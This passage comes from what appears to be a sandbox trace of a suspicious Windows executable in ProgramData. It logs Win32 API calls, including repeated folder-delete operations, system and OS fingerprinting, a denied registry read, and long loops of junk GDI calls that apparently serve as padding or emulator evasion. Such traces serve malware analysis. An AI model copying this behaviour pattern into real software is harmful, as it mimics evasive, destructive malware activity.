lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0087.462] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.462] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a96c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.462] GetDC (hWnd=0x0) returned 0x3010210 [0087.462] CreateCompatibleDC (hdc=0x3010210) returned 0x601020d [0087.462] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eeb8 | out: piconinfo=0x18eeb8) returned 0 [0087.462] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.462] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a768, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.462] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.462] GetDC (hWnd=0x0) returned 0x301020e [0087.462] CreateCompatibleDC (hdc=0x301020e) returned 0x601020b [0087.462] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef30 | out: piconinfo=0x18ef30) returned 0 [0087.462] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.462] SetFileAttributesW (lpFileName="ݯ开䅠䍂", dwFileAttributes=0x20) returned 0 [0087.462] GetDC (hWnd=0x0) returned 0x301020c [0087.462] CreateCompatibleDC (hdc=0x301020c) returned 0x6010209 [0087.462] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee68 | out: piconinfo=0x18ee68) returned 0 [0087.462] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dec0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.462] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.462] wsprintfA (in: param_1=0x18dec0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.463] SHFileOperationA (in: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000) | out: lpFileOp=0x18f5f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xb50000)) returned 2 [0087.464] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dcb8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.464] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.464] wsprintfA (in: param_1=0x18dcb8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.464] SHFileOperationA (in: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000) | out: lpFileOp=0x18f5b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20220000)) returned 2 [0087.465] GetDC (hWnd=0x0) returned 0x301020a [0087.465] CreateCompatibleDC (hdc=0x301020a) returned 0x6010207 [0087.465] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef08 | out: piconinfo=0x18ef08) returned 0 [0087.465] GetDC (hWnd=0x0) returned 0x3010208 [0087.465] CreateCompatibleDC (hdc=0x3010208) returned 0x6010205 [0087.465] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efe4 | out: piconinfo=0x18efe4) returned 0 [0087.465] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.465] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dab0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.466] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.466] wsprintfA (in: param_1=0x18dab0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.466] SHFileOperationA (in: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f574*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0087.467] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.467] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a564, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.467] SetFileAttributesW (lpFileName="ݯ瘀", dwFileAttributes=0x20) returned 0 [0087.467] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.467] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d8a8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.467] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.467] wsprintfA (in: param_1=0x18d8a8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.467] SHFileOperationA (in: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000) | out: lpFileOp=0x18f534*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x550000)) returned 2 [0087.469] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.469] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a360, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.469] GetDC (hWnd=0x0) returned 0x3010206 [0087.469] CreateCompatibleDC (hdc=0x3010206) returned 0x6010203 [0087.469] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efa8 | out: piconinfo=0x18efa8) returned 0 [0087.469] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.469] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d6a0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.469] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.469] wsprintfA (in: param_1=0x18d6a0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.469] SHFileOperationA (in: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x350000) | out: lpFileOp=0x18f4f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x350000)) returned 2 [0087.470] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.470] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a15c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.470] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.470] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189f54, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.470] GetDC (hWnd=0x0) returned 0x3010204 [0087.470] CreateCompatibleDC (hdc=0x3010204) returned 0x6010201 [0087.470] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eff8 | out: piconinfo=0x18eff8) returned 0 [0087.470] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.471] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.471] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189d50, lpFilePart=0x181800 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x181800*="system32") returned 0x13 [0087.471] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d7a4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.471] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.471] wsprintfA (in: param_1=0x18d7a4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.471] SHFileOperationA (in: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f614*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0087.472] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.472] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189b4c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.472] GetDC (hWnd=0x0) returned 0x3010202 [0087.472] CreateCompatibleDC (hdc=0x3010202) returned 0x60101ff [0087.472] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef44 | out: piconinfo=0x18ef44) returned 0 [0087.472] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.472] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189948, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.472] GetDC (hWnd=0x0) returned 0x3010200 [0087.472] CreateCompatibleDC (hdc=0x3010200) returned 0x60101fd [0087.472] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef1c | out: piconinfo=0x18ef1c) returned 0 [0087.472] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.472] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189744, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.472] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0087.472] CreateWindowExA (dwExStyle=0x0, lpClassName="BUTTON", lpWindowName="Press", dwStyle=0x80000001, X=100, Y=100, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x55820000, lpParam=0x0) returned 0x1013a [0087.521] ImmGetVirtualKey () returned 0xe5 [0087.521] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401dc [0087.521] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401d9 [0087.521] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30401da [0087.521] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50401d7 [0087.521] CombineRgn (hrgnDst=0x30401da, hrgnSrc1=0x230401dc, hrgnSrc2=0x250401d9, iMode=1) returned 1 [0087.521] CombineRgn (hrgnDst=0x50401d7, hrgnSrc1=0x230401dc, hrgnSrc2=0x250401d9, iMode=4) returned 2 [0087.521] CreateSolidBrush (color=0xff) returned 0x31001d8 [0087.521] CreateSolidBrush (color=0xff0000) returned 0x51001d5 [0087.521] DeleteObject (ho=0x51001d5) returned 1 [0087.521] DeleteObject (ho=0x250401d9) returned 1 [0087.521] DeleteObject (ho=0x230401dc) returned 1 [0087.521] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.522] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.522] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.522] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.526] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.526] BeginPath (hdc=0x0) returned 0 [0087.526] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.526] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.526] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.526] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.526] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.526] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.527] VirtualQuery (in: lpAddress=0x5583ef18, lpBuffer=0x180cd0, dwLength=0x1c | out: lpBuffer=0x180cd0*(BaseAddress=0x5583e000, AllocationBase=0x55820000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0087.527] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.527] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.527] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401d9 [0087.527] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401dc [0087.527] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30401ca [0087.527] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x904072c [0087.527] CombineRgn (hrgnDst=0x30401ca, hrgnSrc1=0x260401d9, hrgnSrc2=0x240401dc, iMode=1) returned 1 [0087.527] CombineRgn (hrgnDst=0x904072c, hrgnSrc1=0x260401d9, hrgnSrc2=0x240401dc, iMode=4) returned 2 [0087.527] CreateSolidBrush (color=0xff) returned 0x61001d5 [0087.527] CreateSolidBrush (color=0xff0000) returned 0x910072e [0087.527] DeleteObject (ho=0x910072e) returned 1 [0087.527] DeleteObject (ho=0x240401dc) returned 1 [0087.527] DeleteObject (ho=0x260401d9) returned 1 [0087.527] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.527] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.527] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.527] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.527] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.527] BeginPath (hdc=0x0) returned 0 [0087.527] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.527] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.527] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.527] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.527] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.527] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.527] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.527] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.527] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401dc [0087.527] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401d9 [0087.527] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x7040733 [0087.527] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x6040731 [0087.528] CombineRgn (hrgnDst=0x7040733, hrgnSrc1=0x250401dc, hrgnSrc2=0x270401d9, iMode=1) returned 1 [0087.528] CombineRgn (hrgnDst=0x6040731, hrgnSrc1=0x250401dc, hrgnSrc2=0x270401d9, iMode=4) returned 2 [0087.528] CreateSolidBrush (color=0xff) returned 0xa10072e [0087.528] CreateSolidBrush (color=0xff0000) returned 0x510072d [0087.528] DeleteObject (ho=0x510072d) returned 1 [0087.528] DeleteObject (ho=0x270401d9) returned 1 [0087.528] DeleteObject (ho=0x250401dc) returned 1 [0087.528] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.528] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.528] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.528] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.528] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.528] BeginPath (hdc=0x0) returned 0 [0087.528] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.528] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.528] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.528] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.528] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.528] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.528] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.528] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.529] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401d9 [0087.529] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401dc [0087.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406d2 [0087.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406d3 [0087.529] CombineRgn (hrgnDst=0x50406d2, hrgnSrc1=0x280401d9, hrgnSrc2=0x260401dc, iMode=1) returned 1 [0087.529] CombineRgn (hrgnDst=0x30406d3, hrgnSrc1=0x280401d9, hrgnSrc2=0x260401dc, iMode=4) returned 2 [0087.529] CreateSolidBrush (color=0xff) returned 0x610072d [0087.529] CreateSolidBrush (color=0xff0000) returned 0x71006a6 [0087.529] DeleteObject (ho=0x71006a6) returned 1 [0087.529] DeleteObject (ho=0x260401dc) returned 1 [0087.529] DeleteObject (ho=0x280401d9) returned 1 [0087.529] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.529] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.529] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.529] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.529] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.529] BeginPath (hdc=0x0) returned 0 [0087.529] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.529] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.529] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.529] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.529] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.529] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.529] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.529] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401dc [0087.529] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401d9 [0087.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406a7 [0087.529] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x90406a4 [0087.529] CombineRgn (hrgnDst=0x50406a7, hrgnSrc1=0x270401dc, hrgnSrc2=0x290401d9, iMode=1) returned 1 [0087.530] CombineRgn (hrgnDst=0x90406a4, hrgnSrc1=0x270401dc, hrgnSrc2=0x290401d9, iMode=4) returned 2 [0087.530] CreateSolidBrush (color=0xff) returned 0x81006a6 [0087.530] CreateSolidBrush (color=0xff0000) returned 0x51006a5 [0087.530] DeleteObject (ho=0x51006a5) returned 1 [0087.530] DeleteObject (ho=0x290401d9) returned 1 [0087.530] DeleteObject (ho=0x270401dc) returned 1 [0087.530] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.530] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.530] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.530] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.530] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.530] BeginPath (hdc=0x0) returned 0 [0087.530] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.530] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.530] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.530] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.530] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.530] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.530] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.530] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.530] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401d9 [0087.530] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401dc [0087.530] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x90406a2 [0087.530] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406a3 [0087.530] CombineRgn (hrgnDst=0x90406a2, hrgnSrc1=0x2a0401d9, hrgnSrc2=0x280401dc, iMode=1) returned 1 [0087.530] CombineRgn (hrgnDst=0x50406a3, 